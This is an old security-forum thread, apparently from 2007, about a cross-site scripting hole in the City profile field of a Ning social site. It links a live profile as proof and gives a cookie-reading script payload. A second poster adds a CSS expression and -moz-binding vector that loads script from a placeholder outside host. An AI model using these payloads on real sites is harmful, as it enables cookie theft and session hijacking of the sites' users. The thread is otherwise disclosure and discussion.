Ning XSS hole

sla.ckers.org is
ha.ckers sla.cking

Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails.

Go to Topic: Previous•Next

Go to: Forum List•Message List•New Topic•Search•Log In

Ning XSS hole

Posted by: Delixe

Date: November 09, 2007 01:08AM

PoC -> http://opensocialdemo.ning.com/profile/Suhail

Image:

My Profile -> Account -> City

It's vulnerable in the City field with the vector "><script>alert(document.cookie);</script>

Ning is supposed to be closing it in the next round of patches I believe.

Edited 4 time(s). Last edit at 11/09/2007 01:31AM by Delixe.

Options: Reply•Quote

Re: Ning XSS hole

Posted by: hackathology

Date: November 18, 2007 06:50AM

nice find

http://hackathology.blogspot.com

Options: Reply•Quote

Re: Ning XSS hole

Posted by: DoctorDan

Date: December 09, 2007 02:34PM

That entire site is absolutely riddled with XSS holes. Any place that allows styled user input (blogs, comments, etc.) allows expression() and -moz-binding.
This vector is what I came up with for comments (Mozilla and IE)...

<a style="x:expression(document.body.firstChild.nextSibling.setAttribute('src','http://yoursite.com/XSS.js'));-moz-binding:url('http://yoursite.com/XSS.xml#xss')"></a>

-Dan

Edited 1 time(s). Last edit at 12/09/2007 02:34PM by DoctorDan.

Options: Reply•Quote

Re: Ning XSS hole

Posted by: maluc

Date: December 22, 2007 07:40AM

a fun exercise in why partial censoring can be dangerous..

spacing comparison can likely uncover more, but i haven't the patience for that ^^

New Image: